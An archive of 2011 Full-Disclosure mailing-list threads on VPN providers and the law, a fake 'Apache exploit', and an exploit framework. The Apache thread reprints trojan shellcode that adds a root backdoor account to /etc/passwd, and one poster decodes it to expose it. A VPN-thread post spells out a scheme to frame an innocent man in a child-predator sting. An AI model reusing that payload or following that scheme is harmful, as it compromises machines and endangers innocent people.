This is ONCE you are actually in front, of the judge...remember, it may take some breaking of civil liberty, for this to happen... or i maybe wrong. cheers xd On 5 October 2011 15:10, Laurelai wrote: > On 10/4/2011 6:50 PM, adam wrote: > > "That actually depends on the situation, contempt can be criminal. And > frankly if you refuse a court order for information like that, the LE > officers will just seize it by gunpoint legally, then arrest you." > > I'm curious as to what you think would cause contempt to be a criminal > offense, especially in that example. > > Secondly, without the appropriate warrant - they couldn't legally take > anything. If they disregarded that truth and did so anyway, they'd open > themselves up to a pretty big lawsuit for violating that individual's civil > rights as well as due process. Not to mention, anything found would likely > end up being inadmissible because it was obtained illegally. > > On Tue, Oct 4, 2011 at 10:39 PM, Laurelai wrote: > >> On 10/4/2011 6:35 PM, adam wrote: >> >> "(Option 3 - the guy heads downtown on a contempt of court charge - >> happens so >> rarely that it's basically a hypothetical)." >> >> You do realize that (at least in the US) - contempt is *not* a criminal >> offense, don't you? >> >> On Tue, Oct 4, 2011 at 8:05 PM, wrote: >> >>> On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said: >>> > On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs >>> wrote: >>> >>> > > As I mentioned before it is hard to expect that a VPN provider will >>> > > risk his company for your $11.52/month, and maybe they would try it >>> > > for some lesser case, but what Lulsec did was grant, so I'm not >>> > > surprised that they bent. >>> > >>> > "Alleged" >>> >>> Yes. So? In most jurisdictions, "alledged" and "probable cause" is >>> sufficient >>> to get a court to sign off on a subpoena and/or warrants. >>> >>> "Dear Judge: On Aug 23, a hacker using the handle "JustFellOutOfTree" >>> did >>> violate Section N, Clause X.Y of the criminal code by hacking into >>> BigStore.com. The connection was traced back to the provider VPNs-R-Us. >>> We >>> would like a court order requesting VPNs-R-Us to provide any and all >>> information they may have regarding this user". >>> >>> That will usually do it (after bulked up to about 3 pages with legalese >>> and >>> dotting the t's and crossing the i's). >>> >>> The next morning, the manager at VPNs-R-Us gets to his office, and finds >>> two guys with guns and a signed piece of paper. At which point one of >>> two >>> things will happen: >>> >>> 1) the guy rolls and gives up all the info. >>> 2) the guy calls his lawyer and makes sure that he gives up all the >>> required info, >>> and not one byte more. >>> >>> (Option 3 - the guy heads downtown on a contempt of court charge - >>> happens so >>> rarely that it's basically a hypothetical). >>> >>> >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> That actually depends on the situation, contempt can be criminal. And >> frankly if you refuse a court order for information like that, the LE >> officers will just seize it by gunpoint legally, then arrest you. >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm > > And they can hold you indefinitely until you comply, or use your lack of > compliance as reasonable suspicion to get that warrant, oh and lets not > forget that they are declaring kids cyber terrorists and then the patriot > act takes effect in cases of suspicion of terrorism, when that happens you > don't have any rights anymore. Realistically we should stop calling them > rights since they aren't really rights, they are privileges that can be > revoked at government convenience. > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
yer it is clarly leet stuff dude...
i ran it and got liek 2000k2.2.* apache user bot in a night! :P
hgehe (jkin)
funny tho.
xd
On 5 October 2011 13:09, VeNoMouS wrote:
> **
> char evil[] =
> "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47
> \x89"
> "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51
> \x89"
> "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80
> \xe8"
> "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63
> \x23"
> "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30
> \x74"
> "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65
> \x3a"
> "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73
> \x68"
> "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77
> \x64"
> "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44
> \x44"
> "\x44\x44"
> .
> execl("/bin/sh", "sh", "-c", evil, 0);
>
> .
>
>
>
> /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd
>
> AHUH.
>
>
>
> On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:
>
> I regularly trawl Pastebin.com to find code - often idiots leave some 0day
> and similar there and it is nice to find.
>
> Well, seeing as I have no test boxes at the moment, can someone check this
> code in a VM? I am not sure if it is legit or not.
>
> http://pastebin.com/ygByEV2e
>
> Thanks :)
>
> ~Darren
>
>
>
>1. char evil[] =
> 2. "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88
>\x46\x47\x89"
> 3. "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89
>\x5e\x51\x89"
> 4. "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55
>\xcd\x80\xe8"
> 5. "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23
>\x2d\x63\x23"
> 6. "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30
>\x30\x30\x74"
> 7. "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30
>\x64\x65\x3a"
> 8. "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62
>\x61\x73\x68"
> 9. "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73
>\x73\x77\x64"
> 10. "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43
>\x43\x44\x44"
> 11. "\x44\x44";
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
(using an old account I must have set up a while ago named w000t).
err..but, you ran it didnt you... so why would u need any old account :P
hehe... just... something wich i find strange.
I dont see any support would be good here :) lol i betting he does ONLy
patch to stop the thing being re-rooted, as it has become public since
posted onlist ;)
hehe you shuld really not let him do much, if thats even true, wich i
really am doubting... specially since u named this old account...when, also
saying u tried to run it..wich would, exec shellcode...so i guess.. once
cleared up, and if true, i know this is done by MANY smarter hax, and, your
IP if it was ran, prolly also gets emailed somewhere, somehow... or, some
alert made, or maybe, not.. but, if he was so fast to login then i wonder...
but, then, he is only stopping it, frok other hackers, not from, other nice
guys :)
xd
On 5 October 2011 14:06, VeNoMouS wrote:
> **
>
> I dunno china offers usa that kind of support all the time . or so
> i heard
>
> On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote:
>
> Wow, I'm extremely impressed with the support that the developer of this
> exploit offers. I had been trying to get the exploit to work for about an
> hour or so (couldn't get root on the target) and noticed that the developer
> of this exploit logged into my machine (using an old account I must have set
> up a while ago named w000t). I couldn't believe it when I saw that he was
> logging in to fix the problem, I've NEVER gotten that kind of support even
> out of paid software. He's been logged in for a couple of hours now, and
> I've noticed that he's downloaded/uploaded quite a bit (probably downloading
> the log files and then uploading patches) so I'm just gonna wait it out. I
> definitely have a good feeling about this though.
>
> On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41 wrote:
>
>> yer it is clarly leet stuff dude...
>> i ran it and got liek 2000k2.2.* apache user bot in a night!
>> :P
>> hgehe (jkin)
>> funny tho.
>> xd
>>
>>
>> On 5 October 2011 13:09, VeNoMouS wrote:
>>
>>> char evil[] =
>>> "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46
>>> \x47\x89"
>>> "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e
>>> \x51\x89"
>>> "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd
>>> \x80\xe8"
>>> "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d
>>> \x63\x23"
>>> "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30
>>> \x30\x74"
>>> "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64
>>> \x65\x3a"
>>> "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61
>>> \x73\x68"
>>> "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73
>>> \x77\x64"
>>> "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43
>>> \x44\x44"
>>> "\x44\x44"
>>> .
>>> execl("/bin/sh", "sh", "-c", evil, 0);
>>>
>>> .
>>>
>>>
>>>
>>> /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd
>>>
>>> AHUH.
>>>
>>>
>>>
>>> On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:
>>>
>>> I regularly trawl Pastebin.com to find code - often idiots leave some
>>> 0day and similar there and it is nice to find.
>>>
>>> Well, seeing as I have no test boxes at the moment, can someone check
>>> this code in a VM? I am not sure if it is legit or not.
>>>
>>> http://pastebin.com/ygByEV2e
>>>
>>> Thanks :)
>>>
>>> ~Darren
>>>
>>>
>>>
>>>1. char evil[] =
>>> 2. "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88
>>>\x46\x47\x89"
>>> 3. "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89
>>>\x5e\x51\x89"
>>> 4. "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55
>>>\xcd\x80\xe8"
>>> 5. "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23
>>>\x2d\x63\x23"
>>> 6. "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30
>>>\x30\x30\x74"
>>> 7. "\x3a\x3a\x30\x3a\x30\x3a\x73\x3
Re: [Full-disclosure] VPN providers and any providers in general...
I still think press drives many and more takedowns, and bends the arms of others to.. for sure. I know of a case here of petty crime, but is relevant ok, the guy had many many, and big charges of murder,manslaughter, in other states within australia, but was asked for his name, in 'vic' , wich (about 10yrs ago - pre babybrother to usa) , draconian like laws enabled police to yes, put ppl in jail for this. So, he took the temporary jail, and monthly, would b brought b4 the judge, and asked again eveytime for the name/address so his infos could be checked. each time he would return... waiting for laws to change. evtually, they just had no room, and threw him out with a slap ion wrist fine... then later, they could not do crap about his murder etc, and he is still free t this day, simply by doing alittle bit of that time, and, not taking the *definate 15+* :P Smart, and only would happen NON usa, but yes, USA and USA press has TOO much power in court, altho online, I think the press if it gets involed* it is always seen as big, because since when is ITsec involved?only wen you hear of mass fraud...etcso, any case would become classed as "oh must be fraud or sumthin BIG for them to get arrested..."... is indeed fact... but, it does take sometimes the press, or others, to simply expose it. many cases are, self explanatory but, some cases are really interesting... although, laws change somuch in usa, it is scarier than the other scary bits ;p cheers, xd On 5 October 2011 13:52, adam wrote: > >>Its frightening how much power judges have, and how poorly they > are overseen. > > Definitely agree there. Some of the civil cases are disgustingly bad, due > to there being no media attention and no real oversight. The civil case > mentioned above is a good example, and all of the excessive child support > orders even further that. > > On topic: I haven't read every single reply here, but from what I've seen: > no one has mentioned the VPN provider being held personally responsible. > Being that the attacks originated from machines they own, if they failed to > turn over user information, could it really be that difficult to pin the > attacks on them and convince a judge that they were responsible? > > On Tue, Oct 4, 2011 at 9:37 PM, Jeffrey Walton wrote: > >> On Tue, Oct 4, 2011 at 10:32 PM, adam wrote: >> >>> >> http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm >> > Did you actually read the link you pasted? >> > [...] and "criminal penalties may not be imposed on someone who has not >> been >> > afforded the protections that the Constitution requires of such criminal >> > proceedings [...] protections include the right [..] >> > Then take a look at the actual rights being referenced. Most of which >> would >> > be violated as a result. >> > In response to 0x41 "This is ONCE you are actually in front, of the >> > judge...remember, it may take some breaking of civil liberty, for this >> to >> > happen... " >> > No, you're absolutely right. That's the point here. Contempt is attached >> to >> > the previous court order, there wouldn't be a new judge/new case for the >> > contempt charge alone. All of it is circumstantial anyway, especially >> due to >> > how much power judges actually have (in both criminal AND civil >> > proceedings). >> Its frightening how much power judges have, and how poorly they are >> overseen. Confer: Judge James Ware, US 9th Circuit Court (this is not >> a local judge in a hillbilly town). >> >> Jeff >> > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
hmm.. yes interesting.. On the flip side would it be that hard for a malicious person who works at a VPN provider to blame it on a customer? I don't think that's what has happened in this case, but hypothetically what is to stop a rouge employee from abusing the trust that a LE official might have and doctoring logs sent to them? Absolutely nothing :) This is where, as i was saying... a shell owner/employee, could easily make any police run in circles simply trying to get a decent tap on something... this is where it gets cloudy... but, this is what is being questioned on this threead to... I guess we have gotten somewhere. A. Do NOT use VPN and shell services, to commit crime B. Do NOT commit crimes, in USA,especially those of a large-scale cyber nature,and C. I apprently am laurelai and, i like popcorn (both are false) Cheers! xd On 5 October 2011 14:30, adam wrote: > That raises a good question: could a good enough defense attorney convey > that point to a judge well enough to get the charges dismissed? Then again, > if they really believed a VPN service would protect them (even while > violating their agreement with said provider) - there's probably at least > *some* evidence on their machine implicating them. In the event that > there's not though, I do wonder how it would play out. > > It'd make for a relatively easy set-up, if that were to work the way you > suggested. You could doctor all of the logs to implicate them, and even go > as far as to use the same software/configuration that they use. No matter > how true their "I have no idea what you're talking about" actually is, the > logs plus added "evidence" could likely be enough. > > That entire thing reminds me of something I thought about after watching > "to catch a predator" a couple of times. You'll notice that in most cases, > the "predators" respond the same way: they play stupid, pretend not to know > what's going on, etc. Imagine if you knew someone in real life that worked > at a pizza delivery place. Now also imagine that you hated said person. > > The "undercovers" on that show are all pretty predictable, and some of the > tactics they use are present in every single bust. Keeping that in mind, and > with enough research, you could easily find one of their undercovers online. > Now imagine starting a dialogue with one of them, pretending to be the > person who works at a pizza place (for sake of simplicity, we'll call him > Mike). Imagine sending pictures of Mike to the undercover, talking about > having sex with her, sending her nude pictures of "you" or other people, and > so on. > > Then wait for one day that you know Mike person is working (and that you > know undercover would be willing to meet). Figuring out the former would be > a simple call to the pizza place "Hey [name], do you know what time Mike > comes in today?" From there, you could tell the undercover that you'll come > in your pizza delivery car so that no one suspects anything, so that > she recognizes you, whatever - and tell her that you'll bring a pizza (maybe > even go as far as to figure out her favorite kind for added "evidence"). > > During the day, lots of pizza places only have one or two drivers present. > You could sit outside the pizza place and wait for [other driver] to leave > and Mike to arrive (or do something to cause [other driver] not to make it > back to the pizza place, e.g. slashing one of his tires on a fake delivery). > There's lots of different ideas that could be implemented, as long as the > end result is that you can guarantee Mike will be delivering the pizza. At > which point, you call and request a delivery to undercover's house. Mike > shows up there, undercover invites him inside and asks him to sit down - and > at that point, Chris Hansen comes walking out. Even though everything Mike > would say is indeed true, it'd sound like BS if we believed he had been > talking to the undercover for a couple of months. He'd "play stupid" and > would be charged with felony offenses of trying to entice a child/yada yada. > > In that situation, even if he could somehow come up with proof that he was > set up - no one's gonna believe a pervert. It's just something that I've > thought about a lot, and I wonder how many others have as well (and I > especially wonder if anyone has ever attempted it). > > > On Wed, Oct 5, 2011 at 12:06 AM, Laurelai wrote: > >> On 10/4/2011 7:52 PM, adam wrote: >> >> >>Its frightening how much power judges have, and how poorly they >> are overseen. >> >> Definitely agree there. Some of the civil cases are disgustingly bad, >> due to there being no media attention and no real oversight. The civil case >> mentioned above is a good example, and all of the excessive child support >> orders even further that. >> >> On topic: I haven't read every single reply here, but from what I've >> seen: no one has mentioned the VPN provider being held personally >> responsible. Being that the attacks originated from machines
Re: [Full-disclosure] VPN providers and any providers in general...
Oh for sure, if it was not for these people really, none of those crimes wich really did annoy us, would have happened. So, i am all for them. and what theyre agenda is. i guess, you just do not abuse things, and expect to be getting away with it.. On 5 October 2011 14:34, adam wrote: > >>Amen to that. They're not perfect, but the ACLU and EFF are > probably among our best bets during these times. > > Agreed. I know the ACLU gets a lot of flack for stepping on peoples' toes, > but no matter what their *alleged* agenda is - they've done a whole lot of > good that would have otherwise never existed. Same with the EFF. It gives, > even if only a tiny amount, some hope in situations where you'd otherwise be > completely helpless. > > On Tue, Oct 4, 2011 at 10:26 PM, wrote: > >> On Tue, 04 Oct 2011 22:04:40 CDT, adam said: >> >> > >>"Good point Jeff, the real question is what does one do to fix it?" >> > >> > http://www.google.com/search?q=related:www.aclu.org >> >> Amen to that. They're not perfect, but the ACLU and EFF are probably >> among our best bets during these times. >> > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Strange Lenovo x121e
Looks like a pre used box... specially with that name, am assuming THINK (thinkcentre/thinkpad - ibm) so in there it might be preused IBM/Lenovo, but strange those files..should never be on the hd on a clean sale. On 6 October 2011 06:57, halfdog wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Hello List, > > I just puchased a Lenovo x121e and just before init with random data > and setting up the crypto disks, I found that the disk was not > completely clean. It seems that > > a) X121 ships with a dirty disk or > b) machine was used before purchase > > After reconstruction of bootsector, a NTFS partition is readable, > pagefile.sys shows > COMPUTERNAME=ADMIN-THINK > > Newest files in / > dr-x-- 1 root root 28672 May 29 09:45 SWDL > - -r 2 root root 2490 May 29 09:36 ExitWinXP.bat > dr-x-- 1 root root 4096 Apr 6 13:59 WWAN1 > dr-x-- 1 root root 0 Mar 1 2011 Temp > dr-x-- 1 root root 0 Jan 6 2011 $Recycle.Bin > dr-x-- 1 root root 4096 Jan 6 2011 Users > dr-x-- 1 root root 0 Jan 6 2011 Intel > - -r 2 root root 1959 Oct 2 2010 bluetooth.txt > > Funny: Might also be infected with virus, that generated sal.xls.exe > > - -r 2 root root 4810 Oct 13 2007 > \346\270\205\351\231\244sal.xls.exe\347\227\205\346\257\222.bat > > The non-printables seem to be UTF-8 and display as Chinese glyphs on > other machine. > > I'm complete noob in win-forensics, but at least it seems, that there > is no evidence for other user accounts, Documents & Settings empty, so > perhaps this could really be an authentic IBM OEM image (with virus), > but they just replaced the boot sector to get rid of the partitions? > > Since I don't want to waste too much time on dirty hardware, I did > some googling, but found nothing of value. > > > Does someone know of similar findings on Lenovo machines and what's > your guess: is it worth to dig in deeper or is it just waste of time > to recover OEM-Windows image, that was deflowered and insufficiently > cleaned by some Chinese factory worker during lunch hours? > > hd > > - -- > http://www.halfdog.net/ > PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFOjLZtxFmThv7tq+4RAjg3AJ4xCLYJqExTYk0kqLowYFdB+RU3PQCgk4yW > zD1Qa8MoApdLGQ5Mns0wpKE= > =UuJ/ > -END PGP SIGNATURE- > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Really, at this stage yes, your right, at this moment with the legal ways as they are, then for sure it is as you say.. this can be said another way: don't be stupid :) This seems to be a general consensus I see.. I guess this is fd..cheers. xd On 5 October 2011 16:26, coderman wrote: > On Tue, Oct 4, 2011 at 9:04 PM, xD 0x41 wrote: > > ... > > This is where, as i was saying... a shell owner/employee, could easily > make > > any police run in circles simply trying to get a decent tap on > something... > > yeah, then they just take whole provider, e.g.: > > "On Sept. 22nd, Microsoft filed for an ex parte temporary restraining > order from the U.S. District Court for the Eastern District of > Virginia against Dominique Alexander Piatti, dotFREE Group SRO and > John Does 1-22. The court granted our request, allowing us to sever > the known connections between the Kelihos botnet and the individual > “zombie computers” under its control. Immediately following the > takedown on Sept. 26th, we served Dominique Alexander Piatti, who was > living and operating his business in the Czech Republic, and dotFREE > Group SRO, with notice of the lawsuit and began discussions with Mr. > Piatti to determine which of his subdomains were being used for > legitimate business, " > > > short of it is basic = > be a discerning customer. > - vpn providers that don't log are better than logging for any period > no matter how short. > - vpn providers that are technically competent are better than those > which will expose you through leaks or when cracked. > - vpn providers resistant to jurisdictional and payment processor > pressure are better than those using easily coerced services, third > parties, or vendors. > - no vpn provider is resistant to you being an ass. if you raise big > heat directly and exclusively on a VPN provider you are both stupid > and subject to them cutting your service if not dumping your logs. > this can be said another way: don't be stupid :) > > > the incompetent and twofaced should be exposed however. i hear > attrition.org likes to keep lists and name names ... > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
wow i was not going to comment on that pack and have not yet looked but, thats plain nasty... to remove a simple credit line, i mean it is not full of greetz etc :s and replace... totally pathetic. On 5 October 2011 20:32, root wrote: > - * @author Stefan Zeiger (szei...@novocode.com) > - print " Written by Blake " > - > > +#Exploit Pack - Security Framework for Exploit Developers > +#Copyright 2011 Juan Sacco http://exploitpack.com > +# > +#This program is free software: you can redistribute it and/or modify > it under the terms of the > +#GNU General Public License as published by the Free Software > Foundation, either version 3 > +#or any later version. > +# > +#This program is distributed in the hope that it will be useful, but > WITHOUT ANY WARRANTY; > +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A > PARTICULAR > +#PURPOSE. See the GNU General Public License for more details. > +# > +#You should have received a copy of the GNU General Public License > along with this program. > +#If not, see http://www.gnu.org/licenses/ > > > > Ys why not? > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
You will inmediately recieve $2 (US Dollars) in your PayPal account for each approved exploit. This is IT dream, 2bux for one 0day or, 100 = 200bux :P dang nabbit thats just to good an offer! what is sad, some people will actually 'do it' until they maybe find some people selling one 0day, for say 3000.hehe... thats verymuch taking advantage...nasty pack not exploitpack...made by others losses. On 5 October 2011 20:49, root wrote: > Wait there is more: > > > > http://exploitpack.com/faq > > How can I earn money by migrating exploits? > You will inmediately recieve $2 (US Dollars) in your PayPal account for > each approved exploit. > > > > Juan Sacco, infosec needs people like you. You make me happy, Juan. > > Thank you. > > > > On 10/04/2011 12:42 PM, nore...@exploitpack.com wrote: > > Exploit Pack is an open source security framework developed by Juan > > Sacco. It combines the benefits of a > > JAVA GUI, Python as Engine and well-known exploits made by users. It > > has a module editor to make the task of > > developing new exploits easier, Instant Search and XML-based modules. > > > > This open source project comes to fill a need, a high quality framework > > for exploits and security researchers > > with a GPL license and Python as engine for its modules. > > > > GPL license to ensure the code will always be free > > Instant search built-in for modules easy access > > Module editor that allows the user to create custom exploits > > Modules use XML DOM, really easy to modify > > Python as Engine because its the language more used on security related > > programming > > > > We are actually working with social code network, to participate in > > this project you will only need a GitHub > > account. > > > > Also, I am looking for financial support to keep me coding. If you want > > to be part of this open source project > > or just want to collaborate with me: > > > > Please reply to jsa...@exploitpack.com > > > > Why don’t you download and give it a try right now? While downloading, > > you may watch this quick video on YouTube! > > > > Video: http://www.youtube.com/watch?v=cMa2OrB7b5A > > Website: http://www.exploitpack.com > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Out of interest, I was considering asking - what is all your opinions on using Metasploit (via RPC) as the "shell handler" in an exploitation framework? I was considering writing a fork of Fimap that used one. Well here, i can say, I have recoded theyre whole fingerprinter for rpc/smb and it r0x. In windows, is worth doing 10x. Awesome handler for exploiting, and the updated ones look even better... although, i am mainly using a cpp fork of theyre rpc-smb fingerprint host-attack... very very good. On 6 October 2011 01:18, Darren Martyn wrote: > When I saw this I too thought "Insect". Though still, I dont recall Insect > having an exploit editor or ANY way to add modules (insect used a Metasploit > install IIRC), but it DOES remind me (scarily) of CANVAS. Might check it out > later. > > Out of interest, I was considering asking - what is all your opinions on > using Metasploit (via RPC) as the "shell handler" in an exploitation > framework? I was considering writing a fork of Fimap that used one. > > On Wed, Oct 5, 2011 at 2:10 PM, Gage Bystrom wrote: > >> I grab a bag of popcorn whenever Juan sends an email. >> >> On Wed, Oct 5, 2011 at 4:25 AM, wrote: >> > On Wed, 05 Oct 2011 06:49:40 -0300, root said: >> >> How can I earn money by migrating exploits? >> >> You will inmediately recieve $2 (US Dollars) in your PayPal account for >> >> each approved exploit. >> > >> > At $2 per pop, you're going to see a lot of exploits that look like they >> were >> > mass-migrated by a Perl script, or by an 11 year old, because that's the >> only two >> > ways it makes economic sense for somebody to work for that pay rate. >> > >> > Man, is it too early in the morning to make popcorn? >> > >> > ___ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Oh just on ThepirateBay thing, I am kind of laughing, look at this... and this shows how easily they bypassed, and still have fine hosting it seems. The Pirate Bay Adds Domain to Bypass Court Order - http://feed.torrentfreak.com/~r/Torrentfreak/~3/ueTghMyUIbE/ You guys are right about that whole thing, i was thinking that they were screwed until i saw this RSS feeds are handy. On 4 October 2011 18:06, Ferenc Kovacs wrote: > http://vpn.hidemyass.com/vpncontrol/legal.html > > "VPN Data > > What we store: Time stamp and IP address when you connect and > disconnect to our service." > > ... > > "Legalities > > Anonymity services such as ours do not exist to hide people from > illegal activity. We will cooperate with law enforcement agencies if > it has become evident that your account has been used for illegal > activities." > > people should read the TOC, AUP and privacy policy especially if they > are planning to use that service for illegal activities. > > As I mentioned before it is hard to expect that a VPN provider will > risk his company for your $11.52/month, and maybe they would try it > for some lesser case, but what Lulsec did was grant, so I'm not > surprised that they bent. > > On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 wrote: > > maybe they are law abiding companies? :) > > > > Who were advertising themselves, and acting like they would NEVER do the > > dirty by handing over any payment records etc... wich is half the reason > i > > believe the people use theose ones, advertising to protect you.. not to > give > > your infos up, for really, no reason. as they did. > > Law abiding or not, then they should be advertising as a law abiding > > company, and not acting like some hackers-oparadise vpn service. > > xd > > > > > > On 4 October 2011 06:16, Ferenc Kovacs wrote: > >> > >> On Mon, Oct 3, 2011 at 10:35 PM, Laurelai > wrote: > >> > On 10/3/2011 10:42 AM, Antony widmal wrote: > >> >> Using an external VPN provider to cover your trace clearly shows your > >> >> incompetency and your idiot assumption. > >> >> Trying to blame the VPN provider rather than accepting your mistake > >> >> and learning from it clearly show your 3 years old mentality. > >> >> > >> >> Also, could you please stop posting as GLOW Xd as well ? > >> >> We do not need your schizophrenic script kiddie "lolololol", "xD", > >> >> hugs, spamming on this mailing list. > >> >> > >> >> You being on this mailing list is once again not the best idea. > >> >> > >> >> Thanks, > >> >> Antony > >> > Actually XD and me are two different people. Second issues of privacy > >> > are always relevant, not understanding that law abiding individuals > >> > should always be concerned about companies that hand over personal > info > >> > at the request of an authority figure are the ones with three year old > >> > mentalities. > >> > >> maybe they are law abiding companies? :) > >> this whole fuss wouldn't have happened, if everybody could just stay a > >> law abiding citizen. > >> > >> -- > >> Ferenc Kovács > >> @Tyr43l - http://tyrael.hu > >> > >> ___ > >> Full-Disclosure - We believe in it. > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and 